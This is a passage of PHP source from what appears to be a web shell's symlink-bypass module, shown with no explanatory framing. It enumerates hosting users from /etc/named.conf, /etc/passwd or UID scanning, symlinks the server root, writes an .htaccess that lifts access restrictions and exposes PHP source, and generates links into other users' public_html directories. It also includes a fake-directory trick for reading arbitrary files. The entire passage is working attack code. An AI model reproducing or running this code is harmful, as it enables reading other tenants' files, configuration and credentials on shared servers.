  515. else if(isset($_GET["symlink"]))
  516. {
  517. $d0mains = @file("/etc/named.conf");
  518. if($d0mains)
  519. {
  520. @mkdir("ROOT",0777);
  521. @chdir("ROOT");
  522. execmd("ln -s / root");
  523. $file3 = 'Options all
  524. DirectoryIndex Sux.html
  525. AddType text/plain .php
  526. AddHandler server-parsed .php
  527. AddType text/plain .html
  528. AddHandler txt .html
  529. Require None
  530. Satisfy Any
  531. ';
  532. $fp3 = fopen('.htaccess','w');
  533. $fw3 = fwrite($fp3,$file3);
  534. @fclose($fp3);
  535. echo "<table align=center border=1 style='width:40%;'><tr><td align=center><font size=4 color=red>Domains</font></td><td align=center><font size=4 color=red>Users</font></td><td align=center><font size=4 color=red>Symlink</font></td></tr>";
  536. foreach($d0mains as $d0main)
  537. {
  538. if(eregi("zone",$d0main))
  539. {
  540. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  541. flush();
  542. if(strlen(trim($domains[1][0])) > 2)
  543. {
  544. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  545. flush();
  546. $site = $user['name'] ;
  547. @symlink("/","ROOT/root");
  548. $site = $domains[1][0];
  549. $ir = 'ir';
  550. $il = 'il';
  551. if (preg_match("/.^$ir/",$domains[1][0]) or preg_match("/.^$il/",$domains[1][0]) )
  552. {
  553. $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domains[1][0]."</div>";
  554. }
  555. echo "
  556. <tr>
  557. <td>
  558. <div class='d0main'><a target='_blank' href=http://www.".$domains[1][0]."/><font size=3 color=#0066FF>".$site." </font></a> </div>
  559. </td>
  560. <td><font size=3 color=#FF0000>".$user['name']."</font></td>
  561. <td>
  562. <a href='ROOT/root/home/".$user['name']."/public_html' target='_blank'><font size=3 color=#0066FF>Symlink</font> </a>
  563. </td>
  564. </tr></div> ";
  565. flush();
  566. flush();
  567. }
  568. }
  569. }
  570. echo "</table>";
  571. }
  572. else
  573. {
  574. $TEST=@file('/etc/passwd');
  575. if ($TEST)
  576. {
  577. @mkdir("ROOT",0777);
  578. @chdir("ROOT");
  579. execmd("ln -s / root");
  580. $file3 = 'Options all
  581. DirectoryIndex Sux.html
  582. AddType text/plain .php
  583. AddHandler server-parsed .php
  584. AddType text/plain .html
  585. AddHandler txt .html
  586. Require None
  587. Satisfy Any
  588. ';
  589. $fp3 = fopen('.htaccess','w');
  590. $fw3 = fwrite($fp3,$file3);
  591. @fclose($fp3);
  592. echo "<table align=center border=1 style='width:40%;'><tr><td align=center><font size=4 color=red>Users</font></td><td align=center><font size=4 color=red>Symlink</font></td></tr>";
  593. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  594. //Output a line of the file until the end is reached
  595. while(!feof($file))
  596. {
  597. $s = fgets($file);
  598. $matches = array();
  599. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  600. $matches = str_replace("home/","",$matches[1]);
  601. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  602. continue;
  603. echo "<tr><td align=center><font size=3 color=lime>" . $matches . "</td>";
  604. echo "<td align=center><font size=3 color=lime><a href=/ROOT/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  605. }
  606. fclose($file);
  607. echo "</table>";
  608. }
  609. else
  610. {
  611. @mkdir("ROOT",0777);
  612. @chdir("ROOT");
  613. execmd("ln -s / root");
  614. $file3 = 'Options all
  615. DirectoryIndex Sux.html
  616. AddType text/plain .php
  617. AddHandler server-parsed .php
  618. AddType text/plain .html
  619. AddHandler txt .html
  620. Require None
  621. Satisfy Any
  622. ';
  623. $fp3 = fopen('.htaccess','w');
  624. $fw3 = fwrite($fp3,$file3);
  625. @fclose($fp3);
  626. echo "<table align=center border=1 style='width:40%;'><tr><td align=center><font size=4 color=red>Users</font></td><td align=center><font size=4 color=red>Symlink</font></td></tr>";
  627. $temp = "";
  628. $val1 = 0;
  629. $val2 = 1000;
  630. for(;$val1 <= $val2;$val1++)
  631. {
  632. $uid = @posix_getpwuid($val1);
  633. if ($uid)
  634. $temp .= join(':',$uid)."\n";
  635. }
  636. echo '<br/>';
  637. $temp = trim($temp);
  638. $file5 = fopen("test.txt","w");
  639. fputs($file5,$temp);
  640. fclose($file5);
  641. $file = fopen("test.txt", "r") or exit("Unable to open file!");
  642. while(!feof($file))
  643. {
  644. $s = fgets($file);
  645. $matches = array();
  646. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  647. $matches = str_replace("home/","",$matches[1]);
  648. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  649. continue;
  650. echo "<tr><td align=center><font size=3 color=lime>" . $matches . "</td>";
  651. echo "<td align=center><font size=3 color=lime><a href=/ROOT/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  652. }
  653. fclose($file);
  654. echo "</table>";
  655. unlink("test.txt");
  656. }
  657. }
  658. }
  659. else if(isset($_GET["symlinkfile"]))
  660. {
  661. if(!isset($_GET['file']))
  662. {
  663. ?>
  664. <center>
  665. <form action="<?php echo $self; ?>">
  666. <input type="hidden" name="symlinkserver">
  667. <input type="hidden" name="symlinkfile">
  668. <input type="text" class="box" name="file" size="50" value="">
  669. <input type="submit" value="Create Symlink" class="but">
  670. </form></center>
  671. <br><br>
  672. <?php
  673. }
  674. else
  675. {
  676. $fakedir="fake";
  677. $fakedep=16;
  678. $num=0; // offset of symlink.$num
  679. if(!empty($_GET['file'])) $file=$_GET['file'];
  680. else if(!empty($_POST['file'])) $file=$_POST['file'];
  681. else $file="";
  682. if(empty($file))
  683. exit;
  684. if(!is_writable("."))
  685. die("not writable directory");
  686. $level=0;
  687. for($as=0;$as<$fakedep;$as++){
  688. if(!file_exists($fakedir))
  689. mkdir($fakedir);
  690. chdir($fakedir);
  691. }
  692. while(1<$as--) chdir("..");
  693. $hardstyle = explode("/", $file);
  694. for($a=0;$a<count($hardstyle);$a++){
  695. if(!empty($hardstyle[$a])){
  696. if(!file_exists($hardstyle[$a]))
  697. mkdir($hardstyle[$a]);
  698. chdir($hardstyle[$a]);
  699. $as++;
  700. }
  701. }
  702. $as++;
  703. while($as--)
  704. chdir("..");
  705. @rmdir("fakesymlink");
  706. @unlink("fakesymlink");
  707. @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
  708. // this loop will skip all ready created symlinks.
  709. while(1)
  710. if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
  711. else $num++;
  712. @unlink("fakesymlink");
  713. mkdir("fakesymlink");
  714. die('<FONT COLOR="RED">check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');
  715. }
  716. }
  717. else if(isset($_REQUEST["script"]))
  718. {
  719. ?>
  720. <center><table><tr><td><a href="<?php echo $self; ?>?manually&script&symlinkserver"><font color="#3366FF" size="4">| Do It Manually |</font></a></td>
  721. <td><a href="<?php echo $self; ?>?automatic&script&symlinkserver"><font color="#3366FF" size="4">| Do It Automatically |</font></a></td>
  722. </tr></table></center>
  723. <?php
  724. if(isset($_REQUEST['manually']))
  725. {
  726. if(!isset($_REQUEST['passwd']))
  727. {
  728. ?>
  729. <center>
  730. <form action="<?php echo $self; ?>" method="post">
  731. <input type="hidden" name="manually">
  732. <input type="hidden" name="script">
  733. <input type="hidden" name="symlinkserver">
  734. <textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
  735. <input type="submit" value="Get Config" class="but">
  736. </form>
  737. </center>
  738. <?php
  739. }
  740. else
  741. {
  742. $getetc = trim($_REQUEST['passwd']);
  743. mkdir("m0bil3");
  744. chdir("m0bil3");
  745. $myfile = fopen("test.txt","w");
  746. fputs($myfile,$getetc);
  747. fclose($myfile);
  748. $file = fopen("test.txt", "r") or exit("Unable to open file!");
  749. while(!feof($file))
  750. {
  751. $s = fgets($file);
  752. $matches = array();
  753. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  754. $matches = str_replace("home/","",$matches[1]);
  755. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  756. continue;
  757. syml($matches,$matches);
  758. }
  759. fclose($file);
  760. unlink("test.txt");
  761. echo "<center><font color=#3366FF size=3>[ Done ]</font></center>";
  762. echo "<br><center><a href=m0bil3_xT target=_blank><font size=3 color=#3366FF>| Go Here |</font></a></center>";
  763. }
  764. }
  765. else if(isset($_REQUEST['automatic']))
  766. {
  767. $d0mains = @file("/etc/named.conf");
  768. if($d0mains)
  769. {
  770. mkdir("m0bil3");
  771. chdir("m0bil3");
  772. foreach($d0mains as $d0main)
  773. {
  774. if(eregi("zone",$d0main))
  775. {
  776. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  777. flush();
  778. if(strlen(trim($domains[1][0])) > 2)
  779. {
  780. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  781. syml($user['name'],$domains[1][0]);
  782. }
  783. }
  784. }
  785. echo "<center><font color=#3366FF size=3>[ Done ]</font></center>";
  786. echo "<br><center><a href=m0bil3_xT target=_blank><font size=3 color=#3366FF>| Go Here |</font></a></center>";
  787. }
  788. else
  789. {
  790. mkdir("m0bil3");
  791. chdir("m0bil3");
  792. $temp = "";
  793. $val1 = 0;
  794. $val2 = 1000;
  795. for(;$val1 <= $val2;$val1++)
  796. {
  797. $uid = @posix_getpwuid($val1);
  798. if ($uid)
  799. $temp .= join(':',$uid)."\n";
  800. }
  801. echo '<br/>';
  802. $temp = trim($temp);
  803. $file5 = fopen("test.txt","w");
  804. fputs($file5,$temp);
  805. fclose($file5);
  806. $file = fopen("test.txt", "r") or exit("Unable to open file!");
  807. while(!feof($file))
  808. {
  809. $s = fgets($file);
  810. $matches = array();
  811. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  812. $matches = str_replace("home/","",$matches[1]);
  813. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  814. continue;
  815. syml($matches,$matches);
  816. }
  817. fclose($file);
  818. echo "</table>";
  819. unlink("test.txt");
  820. echo "<center><font color=#3366FF size=3>[ Done ]</font></center>";
  821. echo "<br><center><a href=m0bil3_xT target=_blank><font size=3 color=#3366FF>| Go Here |</font></a></center>";
  822. }
  823. }
  824. }
  825. }
  826. }
  827. ?>

comments powered by Disqus